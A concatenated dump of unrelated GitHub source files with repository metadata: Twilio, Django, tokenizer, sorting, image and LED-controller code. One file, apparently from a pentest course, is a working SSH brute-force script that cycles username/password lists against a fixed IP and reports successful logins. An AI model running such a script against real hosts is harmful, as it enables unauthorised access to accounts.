            'gcm': payload['gcm'],
            'fcm': payload['fcm'],
            'sms': payload['sms'],
            'facebook_messenger': payload['facebook_messenger'],
            'alexa': payload['alexa'],
        }

        # Context
        self._context = None
        self._solution = {'service_sid': service_sid, }

    @property
    def sid(self):
        """
        :returns: The sid
        :rtype: unicode
        """
        return self._properties['sid']

    @property
    def account_sid(self):
        """
        :returns: The account_sid
        :rtype: unicode
        """
        return self._properties['account_sid']

    @property
    def service_sid(self):
        """
        :returns: The service_sid
        :rtype: unicode
        """
        return self._properties['service_sid']

    @property
    def date_created(self):
        """
        :returns: The date_created
        :rtype: datetime
        """
        return self._properties['date_created']

    @property
    def identities(self):
        """
        :returns: List of Identities.
        :rtype: unicode
        """
        return self._properties['identities']

    @property
    def tags(self):
        """
        :returns: List of Tags
        :rtype: unicode
        """
        return self._properties['tags']

    @property
    def segments(self):
        """
        :returns: The segments
        :rtype: unicode
        """
        return self._properties['segments']

    @property
    def priority(self):
        """
        :returns: Two priorities defined: low and high.
        :rtype: NotificationInstance.Priority
        """
        return self._properties['priority']

    @property
    def ttl(self):
        """
        :returns: This parameter specifies how long the notification is valid.
        :rtype: unicode
        """
        return self._properties['ttl']

    @property
    def title(self):
        """
        :returns: Indicates the notification title.
        :rtype: unicode
        """
        return self._properties['title']

    @property
    def body(self):
        """
        :returns: Indicates the notification body text.
        :rtype: unicode
        """
        return self._properties['body']

    @property
    def sound(self):
        """
        :returns: Indicates a sound to be played.
        :rtype: unicode
        """
        return self._properties['sound']

    @property
    def action(self):
        """
        :returns: Specifies the actions to be displayed for the notification.
        :rtype: unicode
        """
        return self._properties['action']

    @property
    def data(self):
        """
        :returns: This parameter specifies the custom key-value pairs of the notification’s payload.
        :rtype: dict
        """
        return self._properties['data']

    @property
    def apn(self):
        """
        :returns: APNS specific payload that overrides corresponding attributes in a generic payload for Bindings with the apn BindingType.
        :rtype: dict
        """
        return self._properties['apn']

    @property
    def gcm(self):
        """
        :returns: GCM specific payload that overrides corresponding attributes in generic payload for Bindings with gcm BindingType.
        :rtype: dict
        """
        return self._properties['gcm']

    @property
    def fcm(self):
        """
        :returns: FCM specific payload that overrides corresponding attributes in generic payload for Bindings with fcm BindingType.
        :rtype: dict
        """
        return self._properties['fcm']

    @property
    def sms(self):
        """
        :returns: SMS specific payload that overrides corresponding attributes in generic payload for Bindings with sms BindingType.
        :rtype: dict
        """
        return self._properties['sms']

    @property
    def facebook_messenger(self):
        """
        :returns: Messenger specific payload that overrides corresponding attributes in generic payload for Bindings with facebook-messenger BindingType.
        :rtype: dict
        """
        return self._properties['facebook_messenger']

    @property
    def alexa(self):
        """
        :returns: The alexa
        :rtype: dict
        """
        return self._properties['alexa']

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Notify.V1.NotificationInstance>'
| [
"sean@smgoodrich.com"
] | sean@smgoodrich.com |
ddc2c55f50b776d16bca2f8b5f58e50fd6fa2312 | 8b0e0886f9cfc4af097541fd97f609af75392ae9 | /orders/migrations/0007_delete_regularpizza.py | 991549fbaab9f1b2a754432218aae85b1774d3ac | [] | no_license | opalmer3/PinocchiosPizza | 17f78a0173e85f0663180e76724fa4216270d06a | 3a17e014b781ecec9e9d4d35690c0cdfd1d7b5ca | refs/heads/master | 2021-09-23T21:48:31.887121 | 2020-07-05T07:14:29 | 2020-07-05T07:14:29 | 249,429,937 | 0 | 0 | null | 2021-09-22T18:47:18 | 2020-03-23T12:52:07 | Python | UTF-8 | Python | false | false | 288 | py | # Generated by Django 3.0.3 on 2020-03-07 15:08
from django.db import migrations
class Migration(migrations.Migration):
    # Drops the RegularPizza model from the orders app; runs after the
    # 0006_extras migration.

    dependencies = [
        ('orders', '0006_extras'),
    ]

    operations = [
        migrations.DeleteModel(
            name='RegularPizza',
        ),
    ]
| [
"oliverpalmer@OliverdeMacBook-Air.local"
] | oliverpalmer@OliverdeMacBook-Air.local |
e25fa82b3403e32d8fe5366def0356fc32944028 | 95a928ef0d5c8c0c27acace0de0f5df4afeb067d | /iodogservice/iodogservice/urls.py | b683aec8646ad7986aceef618d62e02a99169f37 | [] | no_license | ShuhuangSo/iodogService | 6aaeee4d76c4b366e341634613fb8763a33e949e | acf10a508240125d17de997c767259df74cac4aa | refs/heads/master | 2020-03-22T20:07:28.076499 | 2018-10-01T17:03:31 | 2018-10-01T17:03:31 | 140,574,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,228 | py | """iodogservice URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
    2. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework.documentation import include_docs_urls
from rest_framework_jwt.views import obtain_jwt_token
from django.views.static import serve
from django.conf import settings
from product.views import SupplierListViewSet, SupplierBulkOperation, CheckSupplierName, ProductViewSet, RegProductView
from product.views import SupplierProductViewSet, SetDefaultSupplierView, CheckVskuView, ComboPackViewSet, BaseProductViewSet
from product.views import ComboBulkOperation, ProductBulkOperation, RegProductBulkOperation, ProductBulkImport
from product.views import VskuBulkImport, ComboBulkImport, VcomboBulkImport, SupplierBulkImport, SupplierProductListViewSet
from product.views import SupplierProductBulkOperation, CheckSKU, ProductLabelPrint, Test
from setting.views import LogisticsAuthViewSet, ThirdWarehouseViewSet
from warehouse.views import WarehouseViewSet, AddLocalWarehouse, AddPosition, PositionViewSet, UpdatePosition, BulkUpdatePositionStatus
from warehouse.views import WarehouseStockViewSet
from purchase.views import CalcRefillPromote, RefillPromoteViewSet, RefillSettingViewSet
from rest_framework.routers import DefaultRouter
# DRF router: every ViewSet registered below gets its standard CRUD routes.
router = DefaultRouter()

# Product library module
router.register(r'api/suppliers', SupplierListViewSet, base_name='suppliers')
router.register(r'api/products', ProductViewSet, base_name='products')
router.register(r'api/supplier-product', SupplierProductViewSet, base_name='supplier-product')
router.register(r'api/supplier-product-list', SupplierProductListViewSet, base_name='supplier-product-list')
router.register(r'api/combopacks', ComboPackViewSet, base_name='combopacks')
router.register(r'api/base-products', BaseProductViewSet, base_name='api/base-products')

# Warehouse module
router.register(r'api/warehouse-setting', WarehouseViewSet, base_name='api/warehouse-list')
router.register(r'api/position', PositionViewSet, base_name='api/position')
router.register(r'api/warehouse-stock', WarehouseStockViewSet, base_name='api/warehouse-stock')

# System settings module
router.register(r'api/logistics-auth', LogisticsAuthViewSet, base_name='api/logistics-auth')
router.register(r'api/third-warehouse', ThirdWarehouseViewSet, base_name='api/third-warehouse')

# Replenishment management module
router.register(r'api/refill-promote', RefillPromoteViewSet, base_name='api/refill-promote')
router.register(r'api/refill-setting', RefillSettingViewSet, base_name='api/refill-setting')

urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
    url(r'^docs/', include_docs_urls(title='跨境狗API文档')),
    url(r'^', include(router.urls)),
    url(r'^api/login/', obtain_jwt_token),
    url(r'^upload/(?P<path>.*)$', serve, {"document_root": settings.MEDIA_ROOT}),

    # -----------------Product module------------------
    # Supplier bulk operations
    url(r'^api/suppliers-bulk/', SupplierBulkOperation.as_view(), name='suppliers-bulk'),
    # Check supplier name
    url(r'^api/suppliers-check/', CheckSupplierName.as_view(), name='suppliers-check'),
    # Add registered product / add registration country
    url(r'^api/reg-product/', RegProductView.as_view(), name='reg-product'),
    # Bulk add registered products / registration countries
    url(r'^api/reg-product-bulk/', RegProductBulkOperation.as_view(), name='reg-product-bulk'),
    # Set default supplier
    url(r'^api/set-default-supplier/', SetDefaultSupplierView.as_view(), name='set-default-supplier'),
    # Check whether a virtual SKU exists
    url(r'^api/vsku-check/', CheckVskuView.as_view(), name='vsku-check'),
    # Check whether a SKU exists
    url(r'^api/sku-is-exist-check/', CheckSKU.as_view(), name='sku-is-exist-check'),
    # Combo SKU bulk operations
    url(r'^api/combopacks-bulk/', ComboBulkOperation.as_view(), name='combopacks-bulk'),
    # Product bulk operations
    url(r'^api/products-bulk/', ProductBulkOperation.as_view(), name='products-bulk'),
    # Supplier-product association bulk operations
    url(r'^api/supplier-products-bulk/', SupplierProductBulkOperation.as_view(), name='supplier-products-bulk'),
    # Product bulk import
    url(r'^api/import-product/', ProductBulkImport.as_view(), name='import-product'),
    # Product virtual SKU bulk import
    url(r'^api/import-vsku/', VskuBulkImport.as_view(), name='import-vsku'),
    # Combo product bulk import
    url(r'^api/import-combo/', ComboBulkImport.as_view(), name='import-combo'),
    # Virtual combo SKU bulk import
    url(r'^api/import-vcombo/', VcomboBulkImport.as_view(), name='import-vcombo'),
    # Supplier bulk import
    url(r'^api/import-supplier/', SupplierBulkImport.as_view(), name='import-supplier'),
    # Print product labels
    url(r'^api/product-print/', ProductLabelPrint.as_view(), name='product-print'),
    # test
    url(r'^api/product-test/', Test.as_view(), name='product-test'),

    # -----------------Warehouse module------------------
    # Add a local warehouse
    url(r'^api/warehouse-add-local/', AddLocalWarehouse.as_view(), name='warehouse-add-local'),
    # Add a storage position
    url(r'^api/position-add/', AddPosition.as_view(), name='position-add'),
    # Update a storage position
    url(r'^api/position-update/', UpdatePosition.as_view(), name='position-update'),
    # Bulk update position status
    url(r'^api/position-bulk-update/', BulkUpdatePositionStatus.as_view(), name='position-bulk-update'),

    # -----------------Replenishment management module------------------
    # Replenishment calculation
    url(r'^api/refill-calc/', CalcRefillPromote.as_view(), name='refill-calc'),
]
| [
"shuhuang.so@qq.com"
] | shuhuang.so@qq.com |
1dca65b0e31944c67b64eb4542abf988338475ba | 882026439fb24cacbd1b671ae43bd0da2ac734df | /tokenization_kobert.py | 34d3fa079c7717814a8dd0d6598c01ac5a33c59f | [
"Apache-2.0"
] | permissive | fightnyy/Stock_Prediction | 94fa5761a1860429d033ecc735d9fa89d75667b8 | f0dd42bd511e74876ede92c4d10aa6384d542613 | refs/heads/master | 2023-07-11T04:30:48.546817 | 2021-08-19T06:30:01 | 2021-08-19T06:30:01 | 338,271,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,022 | py | # coding=utf-8
# Copyright 2018 Google AI, Google Brain and Carnegie Mellon University Authors and the HuggingFace Inc. team and Jangwon Park
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tokenization classes for KoBert model."""
import logging
import os
import sentencepiece as spm
import unicodedata
from shutil import copyfile
from transformers import PreTrainedTokenizer
logger = logging.getLogger(__name__)

# Local filenames for the two vocabulary artifacts this tokenizer needs:
# the sentencepiece model and a plain-text token list.
VOCAB_FILES_NAMES = {"vocab_file": "tokenizer_78b3253a26.model",
                     "vocab_txt": "vocab.txt"}

# Download URLs for each published KoBERT checkpoint's vocabulary files.
PRETRAINED_VOCAB_FILES_MAP = {
    "vocab_file": {
        "monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/tokenizer_78b3253a26.model",
        "monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/tokenizer_78b3253a26.model",
        "monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/tokenizer_78b3253a26.model"
    },
    "vocab_txt": {
        "monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/vocab.txt",
        "monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/vocab.txt",
        "monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/vocab.txt"
    }
}

# Maximum input length supported by each checkpoint.
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    "monologg/kobert": 512,
    "monologg/kobert-lm": 512,
    "monologg/distilkobert": 512
}

# Default tokenizer keyword arguments per checkpoint.
PRETRAINED_INIT_CONFIGURATION = {
    "monologg/kobert": {"do_lower_case": False},
    "monologg/kobert-lm": {"do_lower_case": False},
    "monologg/distilkobert": {"do_lower_case": False}
}

# SentencePiece's word-boundary marker character.
SPIECE_UNDERLINE = u'▁'
class KoBertTokenizer(PreTrainedTokenizer):
    """
    SentencePiece based tokenizer. Peculiarities:
        - requires `SentencePiece <https://github.com/google/sentencepiece>`_
    """
    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES

    def __init__(
            self,
            vocab_file,
            vocab_txt,
            do_lower_case=False,
            remove_space=True,
            keep_accents=False,
            unk_token="[UNK]",
            sep_token="[SEP]",
            pad_token="[PAD]",
            cls_token="[CLS]",
            mask_token="[MASK]",
            **kwargs):
        super().__init__(
            unk_token=unk_token,
            sep_token=sep_token,
            pad_token=pad_token,
            cls_token=cls_token,
            mask_token=mask_token,
            **kwargs
        )

        # Build vocab
        # token2idx / idx2token mirror the plain-text vocabulary file; ids are
        # taken from line order, not from the sentencepiece model.
        self.token2idx = dict()
        self.idx2token = []
        with open(vocab_txt, 'r', encoding='utf-8') as f:
            for idx, token in enumerate(f):
                token = token.strip()
                self.token2idx[token] = idx
                self.idx2token.append(token)

        # NOTE(review): sentencepiece is already imported at module level;
        # this re-import only emits a friendlier message when it is missing.
        try:
            import sentencepiece as spm
        except ImportError:
            logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
                           "pip install sentencepiece")

        self.do_lower_case = do_lower_case
        self.remove_space = remove_space
        self.keep_accents = keep_accents
        self.vocab_file = vocab_file
        self.vocab_txt = vocab_txt

        self.sp_model = spm.SentencePieceProcessor()
        self.sp_model.Load(vocab_file)

    @property
    def vocab_size(self):
        # Size of the text vocabulary, not of the sentencepiece model.
        return len(self.idx2token)

    def get_vocab(self):
        # Merge the base vocabulary with any tokens added after loading.
        return dict(self.token2idx, **self.added_tokens_encoder)

    def __getstate__(self):
        # The SentencePieceProcessor is not picklable; drop it and reload
        # from self.vocab_file in __setstate__.
        state = self.__dict__.copy()
        state["sp_model"] = None
        return state

    def __setstate__(self, d):
        self.__dict__ = d
        try:
            import sentencepiece as spm
        except ImportError:
            logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
                           "pip install sentencepiece")
        self.sp_model = spm.SentencePieceProcessor()
        self.sp_model.Load(self.vocab_file)

    def preprocess_text(self, inputs):
        # Whitespace normalization, quote unification, optional accent
        # stripping (NFKD + drop combining marks) and lower-casing.
        if self.remove_space:
            outputs = " ".join(inputs.strip().split())
        else:
            outputs = inputs
        outputs = outputs.replace("``", '"').replace("''", '"')

        if not self.keep_accents:
            outputs = unicodedata.normalize('NFKD', outputs)
            outputs = "".join([c for c in outputs if not unicodedata.combining(c)])
        if self.do_lower_case:
            outputs = outputs.lower()

        return outputs

    def _tokenize(self, text, return_unicode=True, sample=False):
        """ Tokenize a string.

        *return_unicode* is unused and kept only for API compatibility;
        *sample* switches to sentencepiece's stochastic segmentation.
        """
        text = self.preprocess_text(text)

        if not sample:
            pieces = self.sp_model.EncodeAsPieces(text)
        else:
            pieces = self.sp_model.SampleEncodeAsPieces(text, 64, 0.1)
        new_pieces = []
        for piece in pieces:
            # Split pieces like "2000," so the trailing comma becomes its own
            # token while the digits are re-segmented without the boundary
            # marker duplicated.
            if len(piece) > 1 and piece[-1] == str(",") and piece[-2].isdigit():
                cur_pieces = self.sp_model.EncodeAsPieces(piece[:-1].replace(SPIECE_UNDERLINE, ""))
                if piece[0] != SPIECE_UNDERLINE and cur_pieces[0][0] == SPIECE_UNDERLINE:
                    if len(cur_pieces[0]) == 1:
                        cur_pieces = cur_pieces[1:]
                    else:
                        cur_pieces[0] = cur_pieces[0][1:]
                cur_pieces.append(piece[-1])
                new_pieces.extend(cur_pieces)
            else:
                new_pieces.append(piece)

        return new_pieces

    def _convert_token_to_id(self, token):
        """ Converts a token (str/unicode) in an id using the vocab. """
        return self.token2idx.get(token, self.token2idx[self.unk_token])

    def _convert_id_to_token(self, index, return_unicode=True):
        """Converts an index (integer) in a token (string/unicode) using the vocab."""
        return self.idx2token[index]

    def convert_tokens_to_string(self, tokens):
        """Converts a sequence of tokens (strings for sub-words) in a single string."""
        out_string = "".join(tokens).replace(SPIECE_UNDERLINE, " ").strip()
        return out_string

    def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
        """
        Build model inputs from a sequence or a pair of sequence for sequence classification tasks
        by concatenating and adding special tokens.
        A KoBERT sequence has the following format:
            single sequence: [CLS] X [SEP]
            pair of sequences: [CLS] A [SEP] B [SEP]
        """
        if token_ids_1 is None:
            return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
        cls = [self.cls_token_id]
        sep = [self.sep_token_id]
        return cls + token_ids_0 + sep + token_ids_1 + sep

    def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
        """
        Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
        special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods.

        Args:
            token_ids_0: list of ids (must not contain special tokens)
            token_ids_1: Optional list of ids (must not contain special tokens), necessary when fetching sequence ids
                for sequence pairs
            already_has_special_tokens: (default False) Set to True if the token list is already formated with
                special tokens for the model

        Returns:
            A list of integers in the range [0, 1]: 0 for a special token, 1 for a sequence token.
        """
        if already_has_special_tokens:
            if token_ids_1 is not None:
                raise ValueError(
                    "You should not supply a second sequence if the provided sequence of "
                    "ids is already formated with special tokens for the model."
                )
            return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))

        if token_ids_1 is not None:
            return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
        return [1] + ([0] * len(token_ids_0)) + [1]

    def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
        """
        Creates a mask from the two sequences passed to be used in a sequence-pair classification task.
        A KoBERT sequence pair mask has the following format:
        0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1
        | first sequence    | second sequence
        if token_ids_1 is None, only returns the first portion of the mask (0's).
        """
        sep = [self.sep_token_id]
        cls = [self.cls_token_id]
        if token_ids_1 is None:
            return len(cls + token_ids_0 + sep) * [0]
        return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]

    def save_vocabulary(self, save_directory):
        """ Save the sentencepiece vocabulary (copy original file) and special tokens file
            to a directory.
        """
        if not os.path.isdir(save_directory):
            logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
            return

        # 1. Save sentencepiece model
        out_vocab_model = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_file"])

        if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_model):
            copyfile(self.vocab_file, out_vocab_model)

        # 2. Save vocab.txt
        # Warn (but still write) if the id sequence has gaps, which would mean
        # a corrupted vocabulary.
        index = 0
        out_vocab_txt = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_txt"])
        with open(out_vocab_txt, "w", encoding="utf-8") as writer:
            for token, token_index in sorted(self.token2idx.items(), key=lambda kv: kv[1]):
                if index != token_index:
                    logger.warning(
                        "Saving vocabulary to {}: vocabulary indices are not consecutive."
                        " Please check that the vocabulary is not corrupted!".format(out_vocab_txt)
                    )
                    index = token_index
                writer.write(token + "\n")
                index += 1

        return out_vocab_model, out_vocab_txt
| [
"fightnyy@naver.com"
] | fightnyy@naver.com |
dc52624b745e24996b18b3d581240cefcbe6d403 | 04934bc61ceab01ad24ab1672461a1b103884e91 | /ssh/sshconn_002.py | da12bca4af6f78377d324cb95c618bfe4ad0dab7 | [] | no_license | aiedonline/aulapentest | 05f31d0410493f02361fe778ab02d584aa84ef5e | 1dd28feb95941f49205af836c9013283b4cb6b99 | refs/heads/main | 2023-08-18T10:22:19.596876 | 2021-09-26T20:14:50 | 2021-09-26T20:14:50 | 402,219,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | #!/usr/bin/python
import sys;
from netmiko import Netmiko
ip = "11.11.11.171"

print("\033[1;33m[*] - SSH Bruteforce Attack", " \033[0;0m")
print("\033[1;33m[*] - SSH target", ip, " \033[0;0m")

# Read the user list once and close the file immediately (the original kept
# the handle open for the whole attack loop).
with open("user.txt") as user_file:
    users = user_file.readlines()

for user in users:
    tested_passwords = []
    with open("password.txt") as password_file:
        passwords = password_file.readlines()
    # The most common password is the username itself, so try it first.
    passwords.insert(0, user)
    for password in passwords:
        # Skip duplicate candidates for this user.
        if password in tested_passwords:
            continue
        tested_passwords.append(password)
        try:
            sshconn = Netmiko(ip, username=user.strip(), password=password.strip(), device_type="linux")
            sshconn.disconnect()
            print("\033[1;32m[+] SUCES PARA", user.strip(), password.strip(), " \033[0;0m")
        except KeyboardInterrupt:
            # Fixed message typo ("Usuarqio" -> "Usuario").
            print('Usuario quer sair.')
            sys.exit(0)
        except Exception:
            # Narrowed from a bare except so SystemExit/KeyboardInterrupt are
            # no longer swallowed; any connection/auth failure lands here.
            print("\033[1;31m[-] FALHA PARA", user.strip(), password.strip(), " \033[0;0m")
| [
"yellow@battosai.yellow.dojo"
] | yellow@battosai.yellow.dojo |
8154ce9d82bc5533326b0e641b518b607fc704f8 | b1a876258834300bcdd46aa162c0910493dc808d | /sort/quick_sort.py | 5d06aa20a90a770ce0c84ab449bb92a8ad312c08 | [] | no_license | strengthening/python_test | 6dda572909dfb90e48ed53a8100a7d3583d3488c | 8fe74f6fc321c3342982e80b67baaafb423180c6 | refs/heads/master | 2020-12-30T16:02:26.530573 | 2017-05-19T01:08:10 | 2017-05-19T01:08:10 | 90,954,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py |
def quick_sort(slist):
    """Sort ``slist`` in place using quicksort."""
    last_index = len(slist) - 1
    qsort(slist, 0, last_index)
def qsort(slist, low, high):
    """Recursively quicksort ``slist[low:high + 1]`` in place."""
    if low >= high:
        # Zero or one element: nothing to do.
        return
    pivot_pos = partitional(slist, low, high)
    qsort(slist, low, pivot_pos - 1)
    qsort(slist, pivot_pos + 1, high)
def partitional(slist, low, high):
    """Partition ``slist[low:high + 1]`` around the pivot ``slist[low]``.

    Elements <= pivot end up left of the pivot's final position, elements
    >= pivot end up right of it.  Returns the pivot's final index.

    Bug fix: the original used strict ``>`` / ``<`` comparisons, so an
    element equal to the pivot stopped both inner scans without moving
    either index, and any duplicate of the pivot value (e.g. ``[2, 2]``)
    made the outer loop spin forever.  The hole-filling variant below uses
    ``>=`` / ``<=`` so duplicates always advance a scan pointer.
    """
    piovetkey = slist[low]
    while low < high:
        # Scan from the right for an element strictly below the pivot.
        while low < high and slist[high] >= piovetkey:
            high -= 1
        slist[low] = slist[high]
        # Scan from the left for an element strictly above the pivot.
        while low < high and slist[low] <= piovetkey:
            low += 1
        slist[high] = slist[low]
    # low == high: drop the pivot into its final slot.
    slist[low] = piovetkey
    return low
return low
if __name__ == '__main__':
    # Demo run.  Use the print() call form: the original `print slist`
    # statement is a syntax error on Python 3, while print(slist) behaves
    # identically on both Python 2 and 3 for a single argument.
    slist = [3, 2, 1, 5, 23, 6, 9, 10]
    quick_sort(slist)
    print(slist)
"ducg@foxmail.com"
] | ducg@foxmail.com |
02705c64ac6216a1f64958cfc907cf8487c2fd3b | c68ae881b697289a5b3c384a116cf377844e2df2 | /core/image.py | 292e3207099f842be939dfffdbb3a82d04886da3 | [] | no_license | GPCracker/WoTAtlasConverter | f0ff0e897c1b1f84641ec076b1f75e8de42ad2ec | c5070bb27732e2df1292ce304a3cb910dd310772 | refs/heads/master | 2021-01-19T22:08:40.786898 | 2016-12-21T14:12:57 | 2016-12-21T14:12:57 | 76,104,269 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | import PIL.Image
from .utils import filesystem
class Image(object):
    """Thin wrapper around a PIL RGBA image with atlas-oriented helpers."""

    __slots__ = ('_data', )

    def __init__(self, data):
        super(Image, self).__init__()
        self._data = data
        return

    @property
    def data(self):
        """The underlying PIL image object."""
        return self._data

    @property
    def width(self):
        """Image width in pixels."""
        width, _ = self._data.size
        return width

    @property
    def height(self):
        """Image height in pixels."""
        _, height = self._data.size
        return height

    @property
    def side(self):
        """Length of the longer image side."""
        return max(self._data.size)

    @property
    def area(self):
        """Total pixel count (width * height)."""
        width, height = self._data.size
        return width * height

    @classmethod
    def create_new(sclass, width, height):
        """Create a blank RGBA image of the given size."""
        blank = PIL.Image.new('RGBA', (width, height))
        return sclass(blank)

    @classmethod
    def load_file(sclass, image_path):
        """Load an image from disk, converted to RGBA."""
        with open(image_path, 'rb') as data_io:
            loaded = PIL.Image.open(data_io).convert('RGBA')
        return sclass(loaded)

    def save_file(self, image_path):
        """Write the image to ``image_path`` as PNG, creating parent dirs."""
        filesystem.create_dirs(image_path)
        with open(image_path, 'wb') as data_io:
            self._data.save(data_io, format='PNG')
        return

    def crop_subtexture(self, box=None):
        """Return a new Image holding an independent copy of region ``box``."""
        cropped = self._data.crop(box)
        return self.__class__(cropped.copy())

    def paste_subtexture(self, image, box=None):
        """Paste another Image into this one at ``box`` (mutates self)."""
        self._data.paste(image.data, box)
        return

    def __eq__(self, other):
        if not isinstance(other, self.__class__):
            return NotImplemented
        return self._data == other.data

    def __repr__(self):
        return '{}(data={!r})'.format(self.__class__.__name__, self._data)
"GPCracker@mail.ru"
] | GPCracker@mail.ru |
f7e7ee93eb9d8733258576dbc3e915461981f04d | c30c63f88bd468712dd4e7d58940cf387d5e0ffa | /flaskr/routes.py | 68d8e9ad2961993ff2529d16e23a594838f80658 | [] | no_license | gosantos/sacadev | dd407abc84b1c9a97bf3add54ffbf3449cfbfc70 | e96ada4675a7b633adfe02799205ed06fa5b5752 | refs/heads/master | 2023-01-05T17:56:39.289533 | 2020-11-04T19:57:54 | 2020-11-04T19:57:54 | 310,092,140 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | from flask import Flask
app = Flask(__name__)
@app.route('/')
def hello_world():
return {
"value": "hello"
}
| [
"cjcbusatto@gmail.com"
] | cjcbusatto@gmail.com |
8d1bf89abd0cfa7aac2b61e3d556c1e476452989 | d543a55ab43a984b335edbbd563b6b047b471532 | /roof.py | 10807983d78394f6d9d83cda2fc61b34e46c5263 | [] | no_license | jimmo/led-roof | 2fa7b64565cbf2901883c5ffe33660d43131b3df | 84912e23fac566eb7f98c94f4cdfd13131c15a78 | refs/heads/main | 2023-09-05T06:30:55.695258 | 2021-11-17T13:07:05 | 2021-11-17T13:07:05 | 425,812,630 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | import math
import random
import socket
import struct
import sys
import time
import asyncio
import rainbow
# UDP command opcodes understood by the roof LED controllers.
_CMD_ALL_COLOR = 0
_CMD_STRIP_COLOR = 1
_CMD_STRIP_PIXEL = 2
_CMD_ALL_PIXEL = 2  # NOTE(review): same value as _CMD_STRIP_PIXEL -- confirm intended
_CONTROLLER_DELAY = 0.015  # minimum seconds between packets to one controller
class Controller:
    """One physical LED controller addressed over UDP, with rate limiting."""

    def __init__(self, ip, port):
        self._ip = ip
        self._port = port
        self._last = 0  # monotonic timestamp of the last packet sent
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self._q = []  # pending send tasks, drained by flush()

    async def _wait(self):
        # Sleep until _CONTROLLER_DELAY has elapsed since the previous
        # packet, then claim the new send slot.
        while True:
            dt = time.monotonic() - self._last
            if dt > _CONTROLLER_DELAY:
                break
            await asyncio.sleep(_CONTROLLER_DELAY - dt)
        self._last = time.monotonic()

    async def _send(self, buf):
        # Queue the datagram as a task so callers don't block; flush()
        # awaits the whole queue.
        async def task():
            await self._wait()
            # print(self._ip, time.monotonic()-ttt)
            self._sock.sendto(buf, (self._ip, self._port))
        self._q.append(asyncio.create_task(task()))

    async def flush(self):
        # Wait for every queued packet to go out, then clear the queue.
        await asyncio.gather(*self._q)
        self._q = []

    async def color(self, r, g, b, w=0):
        # Set every pixel on every strip of this controller to one color.
        await self._send(b'roof' + struct.pack('BBBBB', _CMD_ALL_COLOR, r, g, b, w))
class Beam:
    """One LED strip (index ``idx``, ``n`` pixels) on a Controller."""

    def __init__(self, ctrl, idx, n):
        self._ctrl = ctrl
        self._idx = idx
        self._n = n

    async def color(self, r, g, b, w=0):
        # Set the whole strip to a single color.
        await self._ctrl._send(b'roof' + struct.pack('BBBBBB', _CMD_STRIP_COLOR, self._idx, r, g, b, w))

    async def pixel(self, buf):
        # Send raw per-pixel data; ``buf`` is 4 bytes per pixel in
        # g r b w order.
        await self._ctrl._send(b'roof' + struct.pack('BB', _CMD_STRIP_PIXEL, self._idx) + buf)

    async def gradient(self, r, g, b, w=0):
        # Fade linearly from black at pixel 0 up to the given color.
        buf = bytearray()
        for i in range(self._n):
            buf += bytes((i*g//self._n,i*r//self._n,i*b//self._n,i*w//self._n))
        await self.pixel(buf)

    async def rainbow(self, offset=0):
        # Spread a rainbow across the strip, phase-shifted by ``offset``.
        buf = bytearray()
        for i in range(self._n):
            r, g, b = rainbow.rainbow(offset + i * 2400 // self._n)
